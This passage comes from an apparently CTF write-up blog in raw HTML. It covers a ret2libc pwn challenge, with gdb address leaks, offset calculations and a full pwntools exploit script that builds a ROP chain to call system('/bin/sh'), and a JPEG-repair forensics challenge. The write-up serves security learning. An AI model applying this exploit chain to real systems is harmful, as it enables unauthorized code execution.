</picture>\n  </a>\n    </span></p>\n<p>Also, the relative position between the loaded <code class=\"language-text\">libm.so</code> and <code class=\"language-text\">libc.so</code> addresses remains constant even when PIE is enabled.</p>\n<p>In other words, by calculating the base address of <code class=\"language-text\">libm.so</code> from the leaked address of <code class=\"language-text\">fabs</code>, we can ultimately obtain the base address of <code class=\"language-text\">libc.so</code>.</p>\n<p>Once we know that, the rest is a standard ret2libc problem, so we can gather everything we need by identifying the offsets of the <code class=\"language-text\">system</code> function and <code class=\"language-text\">\"/bin/sh\"</code> from the provided library files.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Determine the address where library functions are loaded</span>\n$ info sharedlibrary \nFrom                To                  Syms Read   Shared Object Library\n0x00007f97469fdf10  0x00007f9746a1e550  Yes         /lib64/ld-linux-x86-64.so.2\n0x00007f974666aa80  0x00007f97467291d5  Yes         /lib/x86_64-linux-gnu/libm.so.6\n0x00007f974628f360  0x00007f9746407afc  Yes         /lib/x86_64-linux-gnu/libc.so.6\n\n<span class=\"token comment\"># Determine the address of the system function</span>\n$ p system\n0x7f97462bd420 <span class=\"token operator\">&lt;</span>__libc_system<span class=\"token operator\">></span>\n\n<span class=\"token comment\"># Determine the address of \"/bin/sh\"</span>\n$ <span class=\"token function\">find</span> <span class=\"token string\">\"/bin/sh\"</span> libc\nlibc <span class=\"token builtin class-name\">:</span> 0x7f8659807d88 --<span class=\"token operator\">></span> 0x68732f6e69622f <span class=\"token punctuation\">(</span><span class=\"token string\">'/bin/sh'</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Search for ROP gadgets inside libc</span>\n$ ropsearch <span class=\"token string\">\"pop rdi\"</span> libc\nSearching\n0x00007f9746355873\n\n<span class=\"token comment\"># To fix stack alignment, search for a ROP gadget that returns with ret</span>\n$ ropsearch <span class=\"token string\">\"ret\"</span> libc\nSearching\n0x00007f97462c0528\n\n<span class=\"token comment\"># Address of fabs leaked at runtime</span>\nCheck out my pecs: 0x7f9746690cf0</code></pre></div>\n<p>By calculating the differences between the addresses based on the information above, I was able to determine all of the addresses needed for ret2libc from the leaked address of <code class=\"language-text\">fabs</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token assign-left variable\">atan2Mp</span><span class=\"token operator\">=</span>fab-156272\n<span class=\"token assign-left variable\">libgcc_init</span><span class=\"token operator\">=</span>atan2Mp-4044576\n<span class=\"token assign-left variable\">sysaddr</span><span class=\"token operator\">=</span>libgcc_init+188608\n<span class=\"token assign-left variable\">str_bin_sh</span><span class=\"token operator\">=</span>libgcc_init+1649192\n<span class=\"token assign-left variable\">pop_rdi</span><span class=\"token operator\">=</span>libgcc_init+63083\n<span class=\"token assign-left variable\">ret</span><span class=\"token operator\">=</span>libgcc_init+201160</code></pre></div>\n<p>From here, I constructed the payload.</p>\n<p>This time, I debugged inside a Docker container so that I could use the same library versions as the challenge server.</p>\n<p>So I first installed <code class=\"language-text\">gdbserver</code> and <code class=\"language-text\">tmux</code> inside the Docker container and started them.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">sudo</span> <span class=\"token function\">apt</span> <span class=\"token function\">install</span> gdb gdbserver tmux -y\n\n<span class=\"token comment\"># Start tmux</span>\ntmux</code></pre></div>\n<p>Reference: <a href=\"https://gist.github.com/turekt/71f6950bc9f048daaeb69479845b672b\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Running pwntools gdb debug feature inside Docker containers</a></p>\n<p>Here is the final script I wrote.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># sudo apt install gdb gdbserver</span>\n<span class=\"token comment\"># sudo apt install tmux</span>\n<span class=\"token comment\"># https://gist.github.com/turekt/71f6950bc9f048daaeb69479845b672b</span>\n<span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\nbinary_path <span class=\"token operator\">=</span> <span class=\"token string\">\"./chal\"</span>\nelf <span class=\"token operator\">=</span> context<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>binary_path<span class=\"token punctuation\">)</span>\ncontext<span class=\"token punctuation\">(</span>terminal<span class=\"token operator\">=</span><span class=\"token punctuation\">[</span><span class=\"token string\">'tmux'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'split-window'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'-h'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># running</span>\nio <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>binary_path<span class=\"token punctuation\">,</span> <span class=\"token triple-quoted-string string\">'''\n   break *(main+153)\n'''</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># io.remote(\"addr\", 42072)</span>\n\nrecv <span class=\"token operator\">=</span> io<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nfab <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>recv<span class=\"token punctuation\">[</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Check out my pecs: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b''</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b'\\x41'</span><span class=\"token operator\">*</span><span class=\"token number\">16</span>\n\natan2Mp<span class=\"token operator\">=</span>fab<span class=\"token operator\">-</span><span class=\"token number\">156272</span>\nlibgcc_init<span class=\"token operator\">=</span>atan2Mp<span class=\"token operator\">-</span><span class=\"token number\">4044576</span>\nsysaddr<span class=\"token operator\">=</span>libgcc_init<span class=\"token operator\">+</span><span class=\"token number\">188608</span>\nstr_bin_sh<span class=\"token operator\">=</span>libgcc_init<span class=\"token operator\">+</span><span class=\"token number\">1649192</span>\npop_rdi<span class=\"token operator\">=</span>libgcc_init<span class=\"token operator\">+</span><span class=\"token number\">63083</span>\nret<span class=\"token operator\">=</span>libgcc_init<span class=\"token operator\">+</span><span class=\"token number\">201160</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"\"</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\"\\x41\"</span><span class=\"token operator\">*</span><span class=\"token number\">16</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>ret<span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>pop_rdi<span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>str_bin_sh<span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>sysaddr<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"fab: {}\"</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>fab<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"libgcc_init: {}\"</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>libgcc_init<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"sysaddr: {}\"</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>sysaddr<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"str_bin_sh: {}\"</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>str_bin_sh<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"pop_rdi: {}\"</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>pop_rdi<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"ret: {}\"</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ret<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\nio<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\nrecv <span class=\"token operator\">=</span> io<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nio<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"forensic\" style=\"position:relative;\"><a href=\"#forensic\" aria-label=\"forensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Forensic</h2>\n<h3 id=\"babyforens\" style=\"position:relative;\"><a href=\"#babyforens\" aria-label=\"babyforens permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>babyforens</h3>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 654px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/dd7ca7fda2cbf47908824a79f433322e/68e9c/image-20230109004553665.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 83.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAADl0lEQVQ4y21Ty47aZhj1g7RVNR1ghouHq20GA4OxwYC5+YIxFw8QkkiJqi7aXVUpuy77CH0Gsqj6BH2IvsTMJFlVlU7Pb5JUlbr49F31+T/nO5Z+HVzgtyCHk5vF21mGlj77aQqnySVOo69xGnyF0/CjfYoHX+I0vsDbRQGnsIjf3Qx+ufsC0p+vmvjr5wjv33j48MbF+x+6ePftLZ5eq3j3XROPRxmP2xQe4jQetmk8xsIyeNhc4ul5ER9+muDpxzH+/r6NP6I8pEC/wbGnYWfWcDAV7LoqdpaGQ/8We9af2Q3senUc6I/DJvasx6ZK32C/jtio4mAx7yow5AtI+l0TM9/F2J0i2kSYuXO4Cw/ReolgGWBBCxmvtyt4oQ8/OtcWyxB+GCCIFlisIvSHNlLXaUg9q4MX+y22Sx+DvoFet40Ba45tYdjv0psY2AamTg+2ZWA0sDAZ9c91zo/sLucNOEMLpWIWUqV8g06rgXbzFmqtjFqlCE2pJL7GnsZaXa2yV0n6wpQqezStdp5TWGvUa8jm+ELTvMPLZzG2hBVvCI2Q9vfrJI5CF8f9Grs4wj5e0dZJb73yEW/Ps6E/Q0SKtqsAxWIOUqOhwZs7cEY9DAljLOAIWI6dwBHwEpjDHnuiZsImFWPW6ko1eaFaKzGuIJtNQSoTVpeH6dzpMDpNtJp1NGmW2WauQ85nkSXZwq4zKeRzVygXZZRu8glspVpiXkBJzuNaLNT1OlaRj/lsBM+fwPMmCBdzzGYO/GAGn/nY6WM6HSYz48kA96TjcL/C86OgapHMG3xUJvMNJPGqDWUQeFM2Zgkny8CFO3WwSPiZY844DOZYLz348zECd4KAH1+GInfo51RAB7lcBpJ2qyQvME1KhXxFlE+8CXE8bHgMcRgPMY+y5GJxpIhLl+LD/ICIh+TZIF0W5SbLlM2dribDs8mQi214roPx2E4OZPe6GFFfDjXY/6hBmws0pYwquRcHEfzdFLLktICrq0tIntnAgXIICCUkbI+LtUoJcvYaxUIORR7lJpc9x8IzF0sqJfmzr5ZlKFyeHGXAl7w87gnXRKXNq3Uq0Lo1qPy3NYNm/hurVg2KVUW9XYNeV6CTLuGFqFuUX6FwBcmisF+9OBIyNTayKBkVrZaGZoue8Sffap5rSa5raHNBWz9bq6Giwz9Nlq8hKWoZ/Z7B36eUcFMu5lEuFRI4n/3/xf+xfMJp+uoC/wAl3HaFbMjifAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/dd7ca7fda2cbf47908824a79f433322e/8ac56/image-20230109004553665.webp 240w,\n/static/dd7ca7fda2cbf47908824a79f433322e/d3be9/image-20230109004553665.webp 480w,\n/static/dd7ca7fda2cbf47908824a79f433322e/d7085/image-20230109004553665.webp 654w\"\n              sizes=\"(max-width: 654px) 100vw, 654px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/dd7ca7fda2cbf47908824a79f433322e/8ff5a/image-20230109004553665.png 240w,\n/static/dd7ca7fda2cbf47908824a79f433322e/e85cb/image-20230109004553665.png 480w,\n/static/dd7ca7fda2cbf47908824a79f433322e/68e9c/image-20230109004553665.png 654w\"\n            sizes=\"(max-width: 654px) 100vw, 654px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/dd7ca7fda2cbf47908824a79f433322e/68e9c/image-20230109004553665.png\"\n            alt=\"image-20230109004553665\"\n            title=\"image-20230109004553665\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>A corrupted JPG file was provided.</p>\n<p>I needed to extract the following information from it.</p>\n<ul>\n<li>The latitude and longitude of the shooting location, converted to decimal notation</li>\n<li>The UNIX timestamp of when the photo was taken</li>\n<li>The camera’s serial number</li>\n<li>The string embedded in the image</li>\n</ul>\n<p>The challenge itself should have been easy, but I wasted a lot of time by overthinking it.</p>\n<p>First, the shooting location’s latitude and longitude, the time, and the serial number can all be obtained easily with exiftool.</p>\n<p>I used the following site to convert the latitude and longitude into decimal notation.</p>\n<p>Reference: <a href=\"https://www.benricho.org/map_latlng_10-60conv/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">[Benricho] Converting Latitude/Longitude Between Decimal and Sexagesimal (Degrees, Minutes, Seconds)</a></p>\n<p>There was also one catch with the UNIX timestamp: it had to be calculated using the time zone obtained from the Exif data.</p>\n<p>Reference: <a href=\"https://www.epochconverter.com/timezones\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Time zone list / Epoch to time zone converter</a></p>\n<p><del>Because UNIX time ignores leap seconds in its calculation, I thought it was important to note that if you convert the timestamp to UTC before calculating UNIX time, the result differs from calculating UNIX time without changing the time zone.</del></p>\n<p><em>After checking <a href=\"https://blog.hamayanhamayan.com/entry/2023/01/09/093137#forensics-babyforens\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">another person’s writeup</a>, it seems the real issue was not leap seconds but the need to take daylight saving time into account.</em></p>\n<p>Finally, for the string embedded in the image, my first idea was to extract from the damaged JPG file the range of data that begins with the start marker <code class=\"language-text\">FF D8</code> and ends with the end marker <code class=\"language-text\">FF D9</code> as a JFIF file.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">dd</span> <span class=\"token assign-left variable\">if</span><span class=\"token operator\">=</span>./IMG_0917.jpg <span class=\"token assign-left variable\">of</span><span class=\"token operator\">=</span>./out.jfif <span class=\"token assign-left variable\">bs</span><span class=\"token operator\">=</span><span class=\"token number\">1</span> <span class=\"token assign-left variable\">skip</span><span class=\"token operator\">=</span><span class=\"token number\">10934</span></code></pre></div>\n<p>Reference: <a href=\"https://gigazine.net/news/20200801-jpeg-structure/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">What Is Actually Inside a JPEG Image? - GIGAZINE</a></p>\n<p>This did let me recover the image itself, but it became blurry and unreadable (perhaps because it had been compressed?).</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/90779aa5ce25c264422e1d0c07c4e488/adc48/image-20230109124555080.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 66.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAADb0lEQVQ4yxWSS28bZRSGvWVVBE2cxB7f4vGMHc94xpfx3ePYbuzUuVi52EncpE1DSJtIDUkkmhSaoKotaYAGISqVqqLiUhSpokUsgA0SAhbQ7tgjFvwG1g9fF4/Otzjfq/e85zhKhpu25WImITDdtBJOWsYAC3kP7ZxEs+ShNRrgrKj1gptacgB7qE/UXpo5D7WYl4zPSdZ1Gr/nNI7IkETRkKiaEnbSRcVyU4y5qGa9AolYwk0068FI+8gUgmiGh6EhL7ruxrAkfKFeBkNO1Gg/StiFQxViimhS4h7UXD/RjB+jFCBW8KLoEqrmJiQIKH1owk2lHCOqCBMZHSMpi78uYsYgWlQiGBzAoWUkNCEWjg8IJ27iaQ9R3UMoIt6pQeyCyrCtUi2F8fl7iatu6rbO5ISNLoTUiCT6ZOLJIBFTOAyJDBUxbjQlhBMeZM1FuaiyMVfgUjvDeqfIrUsNnr6/yFd3zrG7OUVrooSZiPB6zymCYTe6iEM2+3H6X8UR0wKkEjJpSyGVVihnZLZmLHYmTQ47Ce6vZHn0ZpaTTZs/Pj3Pv7/e4OhggWY+TCUboVlPsTCVZmkmy9YbVRw+qQc50EfI6yQccHGlqXF7yuD+ao7Hb9l8vZHnx+0Cd5czfLlT46f9s/z28Rwf7TbotkwWG0lWJpK8fbHI9dWXggEngZf4+5D9TrZHwzxcSvDJepmMFcaOy9xbTNLIqrxzscaH57KMpEKUxCT5jDileoCK7aeeEQuLiwzdnh5CoQGGDC9F08t82ssHnTiz1QhJQ+GCcHDnQoGD9QnuXp1ibixKYzyOVQ4z2jHJ1oMUhmXG8wE0rQ+H7O9Hj/iwDB95QSunsDkZFzeosdWucXNljG+Pt3nxYJ3vj+ZZ6qbpzJpMzxZZmLfpLgg6Wc6IhY6NJHDoYS9GWMJUxRELOqUIh2ujPNyb4enNLjfmi6zVNE72uzx/vMft5QrVvEzOCpG0IhRHdDG2Sk7rx7R9ODpnUpwfL1PNaYyXDXamLe5dbvD8iz0+P1hheSROQXqFd1sx9iY0/vpmh835glhiL62KzlynQqdpoSuvoYm4HNe6wzy6vsoPx1f45cEu3x2ucXU6x7W2zeWpGs3CEMvjOY7XGjy5tcJ//zzjxZN9/nx2xN+/f8bPJ++x0c7hlU7hjfTwP7sV004lwzEVAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/90779aa5ce25c264422e1d0c07c4e488/8ac56/image-20230109124555080.webp 240w,\n/static/90779aa5ce25c264422e1d0c07c4e488/d3be9/image-20230109124555080.webp 480w,\n/static/90779aa5ce25c264422e1d0c07c4e488/e46b2/image-20230109124555080.webp 960w,\n/static/90779aa5ce25c264422e1d0c07c4e488/0db18/image-20230109124555080.webp 979w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/90779aa5ce25c264422e1d0c07c4e488/8ff5a/image-20230109124555080.png 240w,\n/static/90779aa5ce25c264422e1d0c07c4e488/e85cb/image-20230109124555080.png 480w,\n/static/90779aa5ce25c264422e1d0c07c4e488/d9199/image-20230109124555080.png 960w,\n/static/90779aa5ce25c264422e1d0c07c4e488/adc48/image-20230109124555080.png 979w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/90779aa5ce25c264422e1d0c07c4e488/d9199/image-20230109124555080.png\"\n            alt=\"image-20230109124555080\"\n            title=\"image-20230109124555080\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I spent a while trying things like changing the size and resolution, but none of it worked, so in the end I decided to approach it by repairing the damaged image.</p>\n<p>After investigating further, I found that what had been corrupted was the start marker of the image. By using a binary editor to rewrite it to the appropriate value, I was able to identify the secret string and retrieve the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 665px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b21a50b31f64145b6087545acbc4390f/5f4af/image-20230109125018319.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 18.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAlElEQVQY011Q7QqFIBTrPaKMFEIUyvxIff/32mUHulQ/xubRjTOHZVlgrUVrDSklXNeFnDNKKaKJ3rvMqL33os/zhNYa9M/zjGmaoJTCcByHBDIshCDgLMYozDM1+Q6heRxHGGPES2botm0YnHMinqZ931/ht+YdzdzkCwbKhnzE0Gc91uUX1FqF78rU67r+6zHkix/Pv3jBTSxafgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b21a50b31f64145b6087545acbc4390f/8ac56/image-20230109125018319.webp 240w,\n/static/b21a50b31f64145b6087545acbc4390f/d3be9/image-20230109125018319.webp 480w,\n/static/b21a50b31f64145b6087545acbc4390f/ced6d/image-20230109125018319.webp 665w\"\n              sizes=\"(max-width: 665px) 100vw, 665px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b21a50b31f64145b6087545acbc4390f/8ff5a/image-20230109125018319.png 240w,\n/static/b21a50b31f64145b6087545acbc4390f/e85cb/image-20230109125018319.png 480w,\n/static/b21a50b31f64145b6087545acbc4390f/5f4af/image-20230109125018319.png 665w\"\n            sizes=\"(max-width: 665px) 100vw, 665px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b21a50b31f64145b6087545acbc4390f/5f4af/image-20230109125018319.png\"\n            alt=\"image-20230109125018319\"\n            title=\"image-20230109125018319\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d92caa80d8d3f69ab05dbc95f37adcf6/0fb99/image-20230109125114955.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 65.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAADa0lEQVQ4yx2S224bVRSG/QZcIGgT2+PD2LXH9ozHnvFhxpmM41MS5+DGcVKMkzRN1DSkTS0LCghQQqKqpI1Cq4KEImgrFVTUgqgE4gIJKoHEBVyAEOKaF+g7fOxwsbX2ltb+/1/rW56S5qeV9TGr+5jRvDT104xrwywUg3TsAONFiemGTN0J0hiRqBX8lBJenMwwdctH3ZDJR4bJ+0+hBF7GE9ckzKyEnQ2Sz4takChkA1jFACUhohkSKUvUYoiiGxPvEKm0TDIlkS2EiYkQwegwMdVHPOnHkxCfk0aAlGhUS350S8Z0o5ijYVRhktKCJPUgUcWHqgeolXXy6SiFjILjZIWgj4wRxRAmibiER7eDpE9cTQnNFq5WCE0PoaSCZE2ZEStGo6oyWUsTi/lRoz5qdopOq4Jlp4kn/KIvJu4KqUxQJMz4SZ4kyQXQhKiiBXBKChuLNv0ll80Fl531Ol+8t8jT22vsDDqsdJuMlAyGvKcIyl70XIS46UOKixlmRfy8Gce2Ev+7OPkz9Nt53pzLsz9v8NGqxYNLDk+ujvHzYZfnv+zz+PgqrYouoKSoljMsdUboti0GF6p4IsFhlIifhOxDkSW2JtMczGf4eNXmm2tVngxcfhg43NtyON4q89PeDL/dOcfDvbNcWDBYniiwPJmj37N5d6OGJxweRg57iYpzIt6fSPFpz+RBv05jVMfKxPnkvEWvkuJix+X+5SptO86Mq+EIys1qmMmJOLOuTE3A9QTDQyQUMb9MGFvA6BXDHC5m2WwZZPUY7TGd/UWTwSsuH76zwqW5LBNTBqUxlXorS/2sguFEaFdjFJM+kVAaQlVCWEaEUV1mpqjwxpyJm0uwNu2wuzLF4w/6/HH/dZ4dLbF10WGpm2NxYYRXl2qsrzbodV1hHKeSOyOgpGSMpFhaUQuqzJwAs9urcGe7xedvdzhcrrDdtMT8mvzz1R53r0wzLdLVHAEyr+CWVRrTGpPFCDlL7OF4XqVdNime0FYjvNY0ubve4M9713h6sMmgU6ESeoHd+TzXuzY/3uxxa3uKiPclClqYek1nvJFhVCy4lhOCB2tTfLm/zXe3+vx6/BZf76/x/sIoN5Yb7JxvM3uyGnqEy+UkN845PP/rEf8+O+LRzSv8/f1tfv/2iM+ub2DETuMPv8h/BW/WSM4Tq3UAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d92caa80d8d3f69ab05dbc95f37adcf6/8ac56/image-20230109125114955.webp 240w,\n/static/d92caa80d8d3f69ab05dbc95f37adcf6/d3be9/image-20230109125114955.webp 480w,\n/static/d92caa80d8d3f69ab05dbc95f37adcf6/e46b2/image-20230109125114955.webp 960w,\n/static/d92caa80d8d3f69ab05dbc95f37adcf6/32b94/image-20230109125114955.webp 965w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d92caa80d8d3f69ab05dbc95f37adcf6/8ff5a/image-20230109125114955.png 240w,\n/static/d92caa80d8d3f69ab05dbc95f37adcf6/e85cb/image-20230109125114955.png 480w,\n/static/d92caa80d8d3f69ab05dbc95f37adcf6/d9199/image-20230109125114955.png 960w,\n/static/d92caa80d8d3f69ab05dbc95f37adcf6/0fb99/image-20230109125114955.png 965w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d92caa80d8d3f69ab05dbc95f37adcf6/d9199/image-20230109125114955.png\"\n            alt=\"image-20230109125114955\"\n            title=\"image-20230109125114955\"\n            loading=\"lazy\"\n            